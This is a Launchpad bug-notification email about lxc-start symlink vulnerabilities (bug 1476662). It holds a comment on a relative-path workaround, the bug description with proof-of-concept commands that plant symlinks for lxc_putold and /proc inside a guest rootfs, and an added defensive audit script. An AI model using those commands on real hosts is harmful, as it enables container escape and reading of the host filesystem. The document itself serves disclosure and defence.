touch-packages team mailing list archive
Message #107543
[Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Looking through the top Google results on how to bind-mount a directory
from the host-server into the lxc-server I notice that:
* Stéphane Graber's "LXC 1.0: Advanced container usage [3/10]" post
(https://www.stgraber.org/2013/12/21/lxc-1-0-advanced-container-usage/)
makes use of the **relative** mount point (in the lxc-server's fstab
config file on the host-server)
* Unfortunately the **official**(?) Debian LXC wiki page on "LXC" has
the topic "Bind mounts inside the container"
(https://wiki.debian.org/LXC#Bind_mounts_inside_the_container) which
uses the lxc.mount.entry line in the config file **and** makes use of an
**absolute** mount point.
So those following the official Debian LXC documentation will be caught
by this security patch. ;-(
Just to be definite: changing all lxc.mount.entry mount points to
**relative** paths is a current workaround.
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662
Title:
lxc-start symlink vulnerabilities may allow guest to read host
filesystem, interfere with apparmor
Status in lxc package in Ubuntu:
Fix Released
Bug description:
lxc-start shuffles around mounts using the helper directory
/usr/lib/x86_64-linux-gnu/lxc (the guest root fs is mounted here).
It then modifies mounts operating in the guest root directory before
invoking init. As it does not check if all mount points are
directories, a malicious guest may modify its internal structure
before shutdown (or may have been created from a manipulated image), and
then, when it is started again, the guest may
* Access the whole host root filesystem
* Block switching from the lxc-start apparmor profile to lxc-container-
default
# All commands below run inside the guest root filesystem, with the
# current directory at the guest's root. The absolute targets point at
# /usr/lib/x86_64-linux-gnu/lxc/..., i.e. at the host-side path under
# which lxc-start mounts this very rootfs, so the symlinks resolve
# into the guest's own tree once lxc-start follows them on the host.
# Real putold before pivot-root (root fs will end here)
mkdir -p /x/lxc_putold
# Faked putold: the directory lxc-start expects is replaced by a symlink
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
# proc fake: replace the guest's /proc with a symlink and provide the
# fake /proc/1/attr/current and /proc/self/status that lxc-start touches
mkdir -p /x/proc
umount /proc
rmdir /proc
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status
The issue was also found during
https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions
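Both points raised on this page, the workaround in the comment (write lxc.mount.entry mount points as relative paths) and the condition in the bug description (lxc-start did not check that its mount points are real directories rather than symlinks), can be audited on the host before a container is started. The script below is an added example written for this page; it is not code from the bug report, from LXC or from Launchpad. It assumes the usual "lxc.mount.entry = src dst fstype options dump pass" line layout, takes the container rootfs as a plain directory argument, and the sample config and rootfs built by make_demo are constructed for illustration only (the rootfs has its /proc replaced by a symlink, as in the bug description). It only inspects files; it mounts nothing and needs no root.

```shell
#!/bin/sh
# Added example (not from the bug report or from LXC): audit an LXC
# container config and rootfs for the two problems discussed above.
#   1. lxc.mount.entry lines whose mount point is absolute (the form the
#      Debian wiki shows and the one the security fix rejects; the
#      relative form is the workaround from the comment).
#   2. mount points inside the rootfs that are symlinks instead of
#      directories, which is what lxc-start failed to check.

# Print one finding per lxc.mount.entry line in $1, resolved against rootfs $2.
audit_lxc_mounts() {
    conf=$1; rootfs=$2
    grep -E '^[[:space:]]*lxc\.mount\.entry[[:space:]]*=' "$conf" |
    sed 's/^[^=]*=//' |
    while read -r src dst fstype opts dump pass; do
        [ -n "$dst" ] || continue
        case $dst in
            /*) printf 'ABSOLUTE %s (use %s)\n' "$dst" "${dst#/}"; rel=${dst#/} ;;
            *)  rel=$dst ;;
        esac
        target="$rootfs/$rel"
        if [ -L "$target" ]; then                 # test -L before -e: a dangling link fails -e
            printf 'SYMLINK %s -> %s\n' "$target" "$(readlink "$target")"
        elif [ ! -e "$target" ]; then
            printf 'MISSING %s\n' "$target"
        elif [ ! -d "$target" ] && [ ! -f "$target" ]; then
            printf 'NOTDIR %s\n' "$target"        # bind mounts onto files are fine, anything else is not
        else
            printf 'OK %s -> %s\n' "$dst" "$target"
        fi
    done
}

# Paths lxc-start itself uses inside the rootfs according to the bug
# description: the putold directory for pivot_root and /proc. A guest
# that has turned either into a symlink is the reported attack.
check_lxc_start_paths() {
    rootfs=$1
    for p in proc lxc_putold; do
        if [ -L "$rootfs/$p" ]; then
            printf 'SYMLINK %s -> %s\n' "$rootfs/$p" "$(readlink "$rootfs/$p")"
        elif [ -e "$rootfs/$p" ] && [ ! -d "$rootfs/$p" ]; then
            printf 'NOTDIR %s\n' "$rootfs/$p"
        else
            printf 'OK %s\n' "$rootfs/$p"
        fi
    done
}

# Emit the config with the leading "/" stripped from every lxc.mount.entry
# mount point, i.e. the workaround from the comment above.
relativize_mounts() {
    sed -E 's#^([[:space:]]*lxc\.mount\.entry[[:space:]]*=[[:space:]]*[^[:space:]]+[[:space:]]+)/#\1#' "$1"
}

# Constructed demo input (not a real container): a config with one absolute
# and one relative mount point, and a rootfs whose /proc is a symlink.
make_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/rootfs/srv/data" "$d/rootfs/x/proc"
    ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc "$d/rootfs/proc"
    cat > "$d/config" <<'EOF'
# constructed sample config
lxc.rootfs = /var/lib/lxc/demo/rootfs
lxc.mount.entry = /srv/data /srv/data none bind 0 0
lxc.mount.entry = /home/user/share home/user/share none bind,ro 0 0
EOF
    echo "$d"
}

# Usage: sh audit-lxc-mounts.sh /var/lib/lxc/NAME/config /var/lib/lxc/NAME/rootfs
if [ "$#" -eq 2 ]; then
    audit_lxc_mounts "$1" "$2"
    check_lxc_start_paths "$2"
fi
```

Run it against each container's config and rootfs; any ABSOLUTE line is one that the patched lxc-start will refuse and that relativize_mounts rewrites, and any SYMLINK line on proc, lxc_putold or a mount target is a rootfs that should not be started until it has been inspected.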